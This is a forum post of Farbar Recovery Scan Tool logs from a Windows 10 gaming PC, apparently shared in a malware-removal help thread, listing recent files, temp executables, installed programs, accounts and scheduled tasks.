2015-12-10 14:39 - 2015-09-10 20:56 - 00065536 _____ C:\WINDOWS\system32\spu_storage.bin
2015-12-10 14:39 - 2015-07-10 01:05 - 00524288 ___SH C:\WINDOWS\system32\config\BBI
2015-12-10 14:36 - 2015-07-30 14:42 - 00000000 ____D C:\WINDOWS\system32\oobe
2015-12-10 14:34 - 2015-07-30 13:49 - 04824408 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2015-12-10 06:08 - 2015-10-29 11:43 - 00004166 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{1E320142-1459-4672-B122-13DC235259CC}
2015-12-10 06:08 - 2013-07-24 20:26 - 00000000 ____D C:\Users\PimpSlap\AppData\Local\Adobe
2015-12-09 17:47 - 2015-07-22 00:56 - 00000000 ____D C:\Users\PimpSlap\AppData\Roaming\.minecraft
2015-12-09 17:47 - 2015-03-08 19:11 - 00000000 ____D C:\ProgramData\Origin
2015-12-09 15:19 - 2015-07-30 14:25 - 00000000 ____D C:\WINDOWS\CbsTemp
2015-12-09 15:18 - 2014-11-26 14:56 - 00000000 ____D C:\WINDOWS\system32\MRT
2015-12-09 15:07 - 2013-04-11 21:40 - 140158008 _____ (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2015-12-09 12:05 - 2015-07-17 15:21 - 00000000 ____D C:\Users\PimpSlap\AppData\Roaming\uTorrent
2015-12-09 11:19 - 2015-07-30 14:42 - 00000000 ____D C:\WINDOWS\system32\NDF
2015-12-09 11:07 - 2015-10-29 12:49 - 00000000 ____D C:\Users\PimpSlap\Desktop\Youtube Videos
2015-12-09 09:25 - 2015-10-28 15:51 - 00000000 ____D C:\Users\PimpSlap\AppData\Local\CrashDumps
2015-12-08 19:39 - 2013-04-11 19:27 - 00301728 ____N (Microsoft Corporation) C:\WINDOWS\system32\MpSigStub.exe
2015-12-08 16:50 - 2013-04-12 10:17 - 00000000 ____D C:\Users\PimpSlap\AppData\Roaming\vlc
2015-12-08 16:18 - 2015-03-23 21:33 - 00000000 ____D C:\Users\PimpSlap\Desktop\Extra Stuff
2015-12-07 20:00 - 2014-11-22 11:04 - 00214392 _____ C:\WINDOWS\SysWOW64\PnkBstrB.exe
2015-12-07 20:00 - 2014-11-22 11:04 - 00214392 _____ C:\WINDOWS\SysWOW64\PnkBstrB.ex0
2015-12-06 16:43 - 2015-10-29 12:52 - 00000000 ____D C:\Users\PimpSlap\Desktop\Game Shortcuts
2015-12-06 16:16 - 2015-10-11 14:24 - 00000000 ___DC C:\WINDOWS\Panther
2015-12-06 16:12 - 2015-10-30 01:42 - 00000000 ___HD C:\$WINDOWS.~BT
2015-12-06 13:17 - 2015-07-27 22:42 - 28314777 _____ C:\BirthdayHangar.zip
2015-12-05 23:28 - 2015-07-14 18:11 - 00000000 ____D C:\Users\PimpSlap\AppData\Local\by_dimabal100000
2015-12-05 13:42 - 2015-04-16 14:53 - 00000000 ____D C:\Users\PimpSlap\Documents\Movies
2015-12-04 18:48 - 2013-04-11 20:56 - 00000000 ____D C:\ProgramData\Symantec
2015-12-04 15:38 - 2015-10-31 12:23 - 00000000 ____D C:\Users\PimpSlap\AppData\Local\MicrosoftEdge
2015-12-03 15:20 - 2015-10-30 15:15 - 00004018 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA1d11368d9c6141c
2015-12-03 15:20 - 2015-10-30 15:15 - 00003786 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore1d11368d9784eb7
2015-12-02 08:50 - 2015-05-22 19:19 - 00000000 ____D C:\Users\PimpSlap\Documents\From The Depths
2015-12-01 16:29 - 2015-08-10 23:34 - 00000000 ____D C:\Program Files (x86)\Origin
2015-11-30 16:32 - 2015-07-30 14:43 - 00826872 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
2015-11-30 16:32 - 2015-07-30 14:43 - 00176632 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
2015-11-27 17:08 - 2015-10-29 12:55 - 00000000 ____D C:\Users\PimpSlap\Desktop\Notes
2015-11-25 15:00 - 2013-05-03 14:02 - 00000000 ____D C:\Users\PimpSlap\AppData\Local\ElevatedDiagnostics
2015-11-22 18:23 - 2015-07-14 18:10 - 49969431 _____ C:\Gnomefathers.zip
2015-11-14 19:28 - 2015-07-30 14:42 - 00000000 ____D C:\WINDOWS\rescache
2015-11-14 09:47 - 2015-04-29 14:08 - 00000000 ____D C:\Users\PimpSlap\AppData\Local\Steam
2015-11-12 19:30 - 2015-03-24 14:35 - 00000000 ____D C:\Users\PimpSlap\Documents\My Games
2015-11-12 18:50 - 2015-02-01 20:57 - 00000000 ____D C:\Games
2015-11-12 12:32 - 2015-02-13 22:47 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\R.G. Mechanics
2015-11-11 13:54 - 2015-05-04 20:23 - 00000000 ____D C:\Users\PimpSlap\Documents\BeamNG.drive
2015-11-11 12:56 - 2015-07-15 19:42 - 00000000 ____D C:\Users\PimpSlap\AppData\Local\Smellyriver
2015-11-11 03:31 - 2015-07-30 14:42 - 00000000 ____D C:\WINDOWS\system32\appraiser
2015-11-10 16:39 - 2015-05-03 18:17 - 00000080 _____ C:\Users\PimpSlap\AppData\Local剜捯獫慴慇敭屳呇⁁屖湥楴汴浥湥湩潦
==================== Files in the root of some directories =======
2015-08-11 00:35 - 2015-11-01 11:14 - 0002564 _____ () C:\Users\PimpSlap\AppData\Roaming\Bubble Dock.boostrap.log
2015-08-11 00:35 - 2015-11-01 11:14 - 0011460 _____ () C:\Users\PimpSlap\AppData\Roaming\Bubble Dock.installation.log
2015-11-11 16:42 - 2015-11-11 16:42 - 0000161 _____ () C:\Users\PimpSlap\AppData\Roaming\Camdata.ini
2015-11-11 16:42 - 2015-11-11 16:42 - 0000408 _____ () C:\Users\PimpSlap\AppData\Roaming\CamLayout.ini
2015-11-11 16:42 - 2015-11-11 16:42 - 0000408 _____ () C:\Users\PimpSlap\AppData\Roaming\CamShapes.ini
2015-11-11 16:42 - 2015-11-11 16:42 - 0004563 _____ () C:\Users\PimpSlap\AppData\Roaming\CamStudio.cfg
2015-07-29 18:40 - 2015-07-30 00:10 - 0000115 _____ () C:\Users\PimpSlap\AppData\Roaming\LogFile.txt
2015-08-13 18:53 - 2015-09-11 14:51 - 0028250 _____ () C:\Users\PimpSlap\AppData\Roaming\net.telestream.wirecast.xml
2015-08-11 00:36 - 2015-11-01 11:14 - 0000156 _____ () C:\Users\PimpSlap\AppData\Roaming\Selection Tools.installation.log
2015-07-10 22:36 - 2015-07-10 22:38 - 0008704 ___SH () C:\Users\PimpSlap\AppData\Roaming\Thumbs.db
2014-11-22 20:06 - 2014-11-22 20:07 - 0033134 _____ () C:\Users\PimpSlap\AppData\Roaming\UserTile.png
2015-08-11 00:35 - 2015-11-01 11:14 - 0000194 _____ () C:\Users\PimpSlap\AppData\Roaming\WindApp.boostrap.log
2015-08-11 00:35 - 2015-11-01 11:14 - 0000156 _____ () C:\Users\PimpSlap\AppData\Roaming\WindApp.installation.log
2015-03-26 19:01 - 2015-12-10 17:23 - 0007608 _____ () C:\Users\PimpSlap\AppData\Local\resmon.resmoncfg
2015-10-11 13:27 - 2015-10-11 13:27 - 0000000 ____H () C:\ProgramData\DP45977C.lfl
2015-09-13 17:17 - 2015-07-15 17:17 - 0000032 ____R () C:\ProgramData\hash.dat
Files to move or delete:
====================
C:\Program Files (x86)\Razer\Comms\RazerComms.exe
C:\ProgramData\hash.dat
Some files in TEMP:
====================
C:\Users\PimpSlap\AppData\Local\Temp\BingSvc.exe
C:\Users\PimpSlap\AppData\Local\Temp\BSvcProcessor.exe
C:\Users\PimpSlap\AppData\Local\Temp\BSvcUpdater.exe
C:\Users\PimpSlap\AppData\Local\Temp\drm_dyndata_7380014.dll
C:\Users\PimpSlap\AppData\Local\Temp\Itibiti_Knctr_C.exe
C:\Users\PimpSlap\AppData\Local\Temp\raptrpatch.exe
C:\Users\PimpSlap\AppData\Local\Temp\raptr_stub.exe
C:\Users\PimpSlap\AppData\Local\Temp\Skin.dll
C:\Users\PimpSlap\AppData\Local\Temp\Social%20Club%20v1.1.6.8%20Setup.exe
C:\Users\PimpSlap\AppData\Local\Temp\vcredist_x64.exe
==================== Bamital & volsnap =================
(There is no automatic fix for files that do not pass verification.)
C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed
LastRegBack: 2015-11-30 18:23
==================== End of FRST.txt ============================
#4
Posted 10 December 2015 - 07:34 PM
jake1master
- Topic Starter
-
- Member
-
- 10 posts
Member
Additional scan result of Farbar Recovery Scan Tool (x64) Version:09-12-2015
Ran by PimpSlap (2015-12-10 17:28:52)
Running from C:\Users\PimpSlap\Desktop
Windows 10 Pro (X64) (2015-10-12 00:19:09)
Boot Mode: Normal
==========================================================
==================== Accounts: =============================
Administrator (S-1-5-21-1710800545-2821560886-2955275411-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-1710800545-2821560886-2955275411-503 - Limited - Disabled)
Guest (S-1-5-21-1710800545-2821560886-2955275411-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-1710800545-2821560886-2955275411-1008 - Limited - Enabled)
PimpSlap (S-1-5-21-1710800545-2821560886-2955275411-1000 - Administrator - Enabled) => C:\Users\PimpSlap
==================== Security Center ========================
(If an entry is included in the fixlist, it will be removed.)
AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
==================== Installed Programs ======================
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
µTorrent (HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\...\uTorrent) (Version: 3.4.5.41372 - BitTorrent Inc.)
A.V.A - Alliance of Valiant Arms (HKLM-x32\...\Steam App 102700) (Version: - RED DUCK Inc.)
ACP Application (Version: 2015.1012.1326.42 - Advanced Micro Devices, Inc.) Hidden
Action! (HKLM-x32\...\Mirillis Action!) (Version: 1.29.0 - Mirillis)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 3.1.0.4880 - Adobe Systems Incorporated)
Adobe Flash Player 18 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 18.0.0.232 - Adobe Systems Incorporated)
Adobe Flash Professional CS5.5 (HKLM-x32\...\{23E445D5-FD83-4C50-A211-EB26A2975317}) (Version: 11.5 - Adobe Systems Incorporated)
Adobe Help Manager (HKLM-x32\...\chc.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 4.0.244 - Adobe Systems Incorporated)
Adobe Illustrator CS6 (HKLM-x32\...\{4869414E-7AEA-4C8E-BE1C-8D40977FD517}) (Version: 16.0 - Adobe Systems Incorporated)
Adobe Photoshop CS6 (HKLM-x32\...\{74EB3499-8B95-4B5C-96EB-7B342F3FD0C6}) (Version: 13.0 - Adobe Systems Incorporated)
Alien Swarm (HKLM-x32\...\Steam App 630) (Version: - Valve)
AMD Catalyst Control Center (HKLM-x32\...\WUCCCApp) (Version: 1.00.0000 - AMD)
AMD Catalyst Install Manager (HKLM\...\{AAFD93A0-6522-9FF4-69CF-15B98681681A}) (Version: 8.0.916.0 - Advanced Micro Devices, Inc.)
APB Reloaded (HKLM-x32\...\Steam App 113400) (Version: - Reloaded Productions)
Armored Warfare MyCom Beta (HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\...\Armored Warfare MyCom Beta) (Version: 1.48 - My.com B.V.)
ASIO4ALL (HKLM-x32\...\ASIO4ALL) (Version: 2.11 Beta2 - Michael Tippach)
Audacity 2.1.1 (HKLM-x32\...\Audacity®_is1) (Version: 2.1.1 - Audacity Team)
Awesomenauts (HKLM-x32\...\Steam App 204300) (Version: - Ronimo Games)
Battlefield 4™ (HKLM-x32\...\{ABADE36E-EC37-413B-8179-B432AD3FACE7}) (Version: 1.6.2.40658 - Electronic Arts)
BeamNG.drive (HKLM-x32\...\Steam App 284160) (Version: - BeamNG)
Blender (HKLM\...\{EA3C8A99-1565-44FF-89FC-926CEEB623B5}) (Version: 2.75.1 - Blender Foundation)
Block N Load (HKLM-x32\...\Steam App 299360) (Version: - Jagex)
Burstfire (HKLM-x32\...\Steam App 349580) (Version: - Nacho Games)
Canon MX340 series MP Drivers (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_MX340_series) (Version: - )
CDisplayEx 1.10.29 (HKLM\...\CDisplayEx_is1) (Version: - Progdigy Software S.A.R.L.)
Celemony Melodyne version 2.1 (HKLM\...\Celemony Melodyne_is1) (Version: - Copyright © 2001-2012 Celemony Software GmbH)
Chivalry: Medieval Warfare (HKLM-x32\...\Steam App 219640) (Version: - Torn Banner Studios)
Cities Skylines (HKLM-x32\...\Cities Skylines_is1) (Version: 1.0 - Релиз от R.G. Steamgames)
Counter-Strike: Global Offensive (HKLM-x32\...\Steam App 730) (Version: - Valve)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
DAEMON Tools Lite (HKLM-x32\...\DAEMON Tools Lite) (Version: 4.49.1.0356 - Disc Soft Ltd)
Dead Island Riptide (HKLM-x32\...\Steam App 216250) (Version: - Techland)
Fallout 4 (HKLM-x32\...\Fallout 4_is1) (Version: - )
FileZilla Client 3.13.1 (HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\...\FileZilla Client) (Version: 3.13.1 - Tim Kosse)
FL Studio 11 (HKLM-x32\...\FL Studio 11) (Version: - Image-Line)
FL Studio 12 (HKLM-x32\...\FL Studio 12) (Version: - Image-Line)
FlowStone FL 3.0 (HKLM-x32\...\FlowStone) (Version: - )
Fraps (remove only) (HKLM-x32\...\Fraps) (Version: - )
From The Depths (HKLM-x32\...\Steam App 268650) (Version: - Brilliant Skies Ltd.)
Frozen Synapse (HKLM-x32\...\Steam App 98200) (Version: - Mode 7)
Garry's Mod (HKLM-x32\...\Steam App 4000) (Version: - Facepunch Studios)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 47.0.2526.80 - Google Inc.)
Google Update Helper (x32 Version: 1.3.29.1 - Google Inc.) Hidden
Grand Theft Auto IV (HKLM-x32\...\Steam App 12210) (Version: - Rockstar North)
Grand Theft Auto IV (x32 Version: 1.0.0013.131 - Rockstar Games Inc.) Hidden
Grand Theft Auto V (HKLM-x32\...\Grand Theft Auto V_R.G. Mechanics_is1) (Version: - R.G. Mechanics, ProZorg_tm)
Grand Theft Auto V v.1.0.350.1 (HKLM-x32\...\Grand Theft Auto V_is1) (Version: - )
Guns of Icarus Online (HKLM-x32\...\Steam App 209080) (Version: - Muse Games)
Heroes & Generals (HKLM-x32\...\Steam App 227940) (Version: - Reto-Moto)
HWiNFO64 Version 5.06 (HKLM\...\HWiNFO64_is1) (Version: 5.06 - Martin Malík - REALiX)
IL Shared Libraries (HKLM-x32\...\IL Shared Libraries) (Version: - Image-Line)
Intel® C++ Redistributables on Intel® 64 (HKLM-x32\...\{AA67D612-0BE5-44D6-9A91-592958F754A1}) (Version: 13.0.198 - Intel Corporation)
Itibiti RTC (x32 Version: 0.0.1 - Itibiti Inc) Hidden
Java 8 Update 25 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F86418025F0}) (Version: 8.0.250 - Oracle Corporation)
Java 8 Update 25 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218025F0}) (Version: 8.0.250 - Oracle Corporation)
Just Cause 2 (HKLM-x32\...\Steam App 8190) (Version: - Avalanche Studios)
Just Cause 2: Multiplayer Mod (HKLM-x32\...\Steam App 259080) (Version: - Avalanche Studios)
Kerbal Space Program (HKLM-x32\...\Steam App 220200) (Version: - Squad)
League of Legends (HKLM-x32\...\League of Legends 3.0.1) (Version: 3.0.1 - Riot Games)
League of Legends (x32 Version: 3.0.1 - Riot Games) Hidden
Macrium Reflect Free Edition (HKLM\...\MacriumReflect) (Version: 6.0 - Paramount Software (UK) Ltd.)
Macrium Reflect Free Edition (Version: 6.0.753 - Paramount Software (UK) Ltd.) Hidden
Magical Jelly Bean KeyFinder (HKLM-x32\...\KeyFinder_is1) (Version: 2.0.10.10 - Magical Jelly Bean)
Microsoft Games for Windows - LIVE (HKLM-x32\...\{2C9EE786-1DDB-4C98-8FA4-B1B9B5A66B77}) (Version: 3.1.186.0 - Microsoft Corporation)
Microsoft Games for Windows - LIVE Redistributable (HKLM-x32\...\{42AA4CA8-DCD8-4308-BCAB-0B6D75856A9D}) (Version: 3.5.95.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 Redistributable - x64 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 Redistributable - x86 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{a2199617-3609-410f-a8e8-e8806c73545b}) (Version: 11.0.61030.0 - Корпорация Майкрософт)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{f0080ca2-80ae-4958-b6eb-e8fa916d744a}) (Version: 11.0.61030.0 - Корпорация Майкрософт)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Xbox 360 Accessories 1.2 (HKLM\...\{D9C50188-12D5-4D3E-8F00-682346C2AA5F}) (Version: 1.20.146.0 - Microsoft)
Microsoft XNA Framework Redistributable 4.0 (HKLM-x32\...\{2BFC7AA0-544C-4E3A-8796-67F3BE655BE9}) (Version: 4.0.20823.0 - Microsoft Corporation)
Movie Maker (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Mozilla Firefox 22.0 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 22.0 (x86 en-US)) (Version: 22.0 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 22.0 - Mozilla)
MSI Afterburner 4.1.1 (HKLM-x32\...\Afterburner) (Version: 4.1.1 - MSI Co., LTD)
My.com Game Center (HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\...\MyComGames) (Version: 3.142 - My.com B.V.)
Next Car Game: Wreckfest (HKLM-x32\...\Steam App 228380) (Version: - Bugbear)
Nidhogg (HKLM-x32\...\Steam App 94400) (Version: - Messhof)
NVIDIA PhysX (HKLM-x32\...\{8B922CF8-8A6C-41CE-A858-F1755D7F5D29}) (Version: 9.12.1031 - NVIDIA Corporation)
Open Broadcaster Software (HKLM-x32\...\Open Broadcaster Software) (Version: - )
OpenAL (HKLM-x32\...\OpenAL) (Version: - )
Origin (HKLM-x32\...\Origin) (Version: 9.7.2.53208 - Electronic Arts, Inc.)
paint.net (HKLM\...\{DF3A46D9-67B3-44B2-9D01-25C8BA772C8A}) (Version: 4.0.6 - dotPDN LLC)
PDF Settings CS6 (x32 Version: 11.0 - Adobe Systems Incorporated) Hidden
PlanetSide 2 (HKLM-x32\...\Steam App 218230) (Version: - Daybreak Games)
PlanetSide 2 (HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\...\DG0-PlanetSide 2) (Version: - Sony Online Entertainment)
PlanetSide 2 (HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\...\SOE-PlanetSide 2) (Version: - Sony Online Entertainment)
PunkBuster Services (HKLM-x32\...\PunkBusterSvc) (Version: 0.993 - Even Balance, Inc.)
Rainbow Six Siege - Closed Beta (HKLM-x32\...\Uplay Install 1001) (Version: - Ubisoft)
Raptr (HKLM-x32\...\Raptr) (Version: - )
Rapture3D 2.4.8 Game (HKLM-x32\...\{D2FCA41E-AC01-4DCD-B3A7-DC9E32363065}}_is1) (Version: - Blue Ripple Sound)
Razer Comms (HKLM-x32\...\Razer Comms) (Version: 5.12 - Razer Inc.)
Razer Cortex (HKLM-x32\...\Razer Cortex_is1) (Version: 6.0.29.0 - Razer Inc.)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7541 - Realtek Semiconductor Corp.)
Red Faction: Guerrilla Steam Edition (HKLM-x32\...\Steam App 20500) (Version: - Volition)
Renesas Electronics USB 3.0 Host Controller Driver (HKLM-x32\...\InstallShield_{5442DAB8-7177-49E1-8B22-09A049EA5996}) (Version: 2.1.28.0 - Renesas Electronics Corporation)
Renesas Electronics USB 3.0 Host Controller Driver (x32 Version: 2.1.28.0 - Renesas Electronics Corporation) Hidden
RivaTuner Statistics Server 6.2.0 (HKLM-x32\...\RTSS) (Version: 6.2.0 - Unwinder)
ROBLOX Player (HKLM-x32\...\{373B1718-8CC5-4567-8EE2-9033AD08A680}) (Version: - ROBLOX Corporation)
Robocraft (HKLM-x32\...\Steam App 301520) (Version: - Freejam)
Rockstar Games Social Club (HKLM-x32\...\Rockstar Games Social Club) (Version: 1.1.5.8 - Rockstar Games)
Silent Hunter 5: Battle of the Atlantic (HKLM-x32\...\Steam App 48110) (Version: - Ubisoft Entertainment)
Silent Hunter III (HKLM-x32\...\Steam App 15210) (Version: - Ubisoft)
Silent Hunter: Wolves of the Pacific (HKLM-x32\...\Steam App 15200) (Version: - Ubisoft Romania)
Skype™ 7.12 (HKLM-x32\...\{6A0549A9-1B96-498C-ACBC-3943001FEB19}) (Version: 7.12.101 - Skype Technologies S.A.)
SlimDrivers (HKLM-x32\...\{5AD12E7A-D739-4451-9BD1-3610EC56D8F5}) (Version: 2.2.45206 - SlimWare Utilities, Inc.)
Source Filmmaker (HKLM-x32\...\Steam App 1840) (Version: - Valve)
Space Engineers (HKLM-x32\...\Steam App 244850) (Version: - Keen Software House)
Spiral Knights (HKLM-x32\...\Steam App 99900) (Version: - Three Rings)
Super Monday Night Combat (HKLM-x32\...\Steam App 104700) (Version: - Uber Entertainment)
Team Fortress 2 (HKLM-x32\...\Steam App 440) (Version: - Valve)
TeamSpeak 3 Client (HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\...\TeamSpeak 3 Client) (Version: 3.0.16 - TeamSpeak Systems GmbH)
Toribash (HKLM-x32\...\Steam App 248570) (Version: - Nabi Studios)
Uplay (HKLM-x32\...\Uplay) (Version: 10.0 - Ubisoft)
UserTesting.com Recorder Plugin (HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\...\UserTestingPlugin) (Version: - UserTesting.com)
Vegas Pro 13.0 (64-bit) (HKLM\...\{1EEE0BEE-0BC8-11E5-A19E-F04DA23A5C58}) (Version: 13.0.453 - Sony)
VLC media player 2.0.5 (HKLM\...\VLC media player) (Version: 2.0.5 - VideoLAN)
War Thunder Launcher 1.0.1.538 (HKLM-x32\...\{ed8deea4-29fa-3932-9612-e2122d8a62d9}}_is1) (Version: - Gaijin Entertainment)
Wargame: AirLand Battle (HKLM-x32\...\Steam App 222750) (Version: - Eugen Systems)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3528.0331 - Microsoft Corporation)
Wirecast (HKLM\...\{C6719F5F-B77C-4BA2-AD0C-8273A26B4B2F}) (Version: 6.0.5 - Telestream LLC)
World of Tanks - Common Test (HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\...\{1EAC1D02-C6AC-4FA6-9A44-96258C37C812ct}_is1) (Version: - Wargaming.net)
World of Tanks (HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\...\{1EAC1D02-C6AC-4FA6-9A44-96258C37C812na}_is1) (Version: - Wargaming.net)
World of Warships (HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\...\{1EAC1D02-C6AC-4FA6-9A44-96258C37C814na}_is1) (Version: - Wargaming.net)
==================== Custom CLSID (Whitelisted): ==========================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
CustomCLSID: HKU\S-1-5-21-1710800545-2821560886-2955275411-1000_Classes\CLSID\{5F63E8CB-8F57-490A-97FE-62BC2F2A5EA4}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-1710800545-2821560886-2955275411-1000_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\PimpSlap\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\FileCoAuth.exe (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1710800545-2821560886-2955275411-1000_Classes\CLSID\{A416C15B-A073-4994-8DB5-87527A41B2FA}\localserver32 -> C:\Program Files\Telestream\Wirecast\Wirecast.exe (Telestream LLC)
==================== Restore Points =========================
04-12-2015 22:44:39 Removed Symantec Endpoint Protection.
09-12-2015 15:03:32 Windows Update
09-12-2015 15:04:52 Windows Update
==================== Hosts content: ===============================
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
2015-07-30 14:42 - 2015-07-30 14:39 - 00000824 ____A C:\WINDOWS\system32\Drivers\etc\hosts
==================== Scheduled Tasks (Whitelisted) =============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
Task: {081ABC0D-24F4-40EA-B6DE-B1C9DA4DB0B0} - System32\Tasks\Microsoft\Windows\Media Center\OCURDiscovery => C:\Windows\ehome\ehPrivJob.exe
Task: {092BE97C-3C33-4A5D-B930-632C4755578B} - System32\Tasks\Microsoft\Windows\Media Center\DispatchRecoveryTasks => C:\Windows\ehome\ehPrivJob.exe
Task: {092DC215-D0D3-4EF3-8D68-760C15460A3F} - System32\Tasks\Microsoft\Windows\Media Center\PeriodicScanRetry => C:\Windows\ehome\MCUpdate.exe
Task: {1EB42D90-5242-4322-8923-B36B9A2E19CE} - System32\Tasks\Microsoft\Windows\Media Center\StartRecording => C:\Windows\ehome\ehrec.exe
Task: {21634F2A-F260-43A3-894C-EC3DC5C419B2} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate => C:\Windows\ehome\mcupdate.exe
